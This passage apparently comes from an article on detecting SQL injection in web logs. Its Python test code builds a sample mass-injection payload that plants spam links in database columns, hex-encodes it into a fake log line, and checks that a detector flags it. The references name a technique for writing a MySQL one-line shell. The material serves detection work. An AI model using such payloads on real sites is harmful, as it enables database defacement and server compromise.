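# Constructed sample payload: a shortened stand-in for request 3 on the decoded slide.
SAMPLE_PAYLOAD = (
    "DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME "
    "from INFORMATION_SCHEMA.columns c WHILE(@@FETCH_STATUS=0) BEGIN "
    "EXEC('UPDATE ['+@T+'] SET ['+@C+']=['+@C+']+''</title><style>.a4tw{}"
    "</style><a href=http://116jurist.ru >юридические-услуги-москва</a>''') END"
)
SAMPLE_HEX = SAMPLE_PAYLOAD.encode("cp1251").hex()

# Constructed log lines: one request in the observed shape, two benign ones.
ATTACK_LINE = (
    f"2012-12-xx 10:03:44 GET /getUser.asp?Serno=51+declare+@s+varchar(8000)+set+@s="
    f"cast(0x{SAMPLE_HEX}+as+varchar(8000))+exec(@s)-- 200"
)
BENIGN_LINE = "2012-12-xx 10:03:45 GET /getUser.asp?Serno=51 200"
BENIGN_HEX_LINE = "2012-12-xx 10:03:46 GET /r.asp?q=cast(0x48656c6c6f+as+varchar(10)) 200"

if __name__ == "__main__":
    for line in (ATTACK_LINE, BENIGN_LINE, BENIGN_HEX_LINE):
        result = scan_line(line)
        print(result["suspicious"], result["markers"])
```

The benign hex line shows why the rule keys on the decoded text rather than on the presence of a hex literal: a legitimate cast(0x…) decodes to harmless text and produces no alert.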
References
• Wu Hanqing (吳翰清), 網路竟然這麼危險 (Traditional Chinese edition of 白帽子讲Web安全), 2012
• MySQL 5.1 manual, String Functions
• MySQL 5.1 manual, Miscellaneous Functions
• MySQL/PHP: writing a one-line shell with load_file/outfile when single quotes are escaped
• Shazin Sadakath, Time Based SQL Injection using heavy queries in MySQL
• Stefan Esser, MySQL and SQL Column Truncation Vulnerabilities, 2008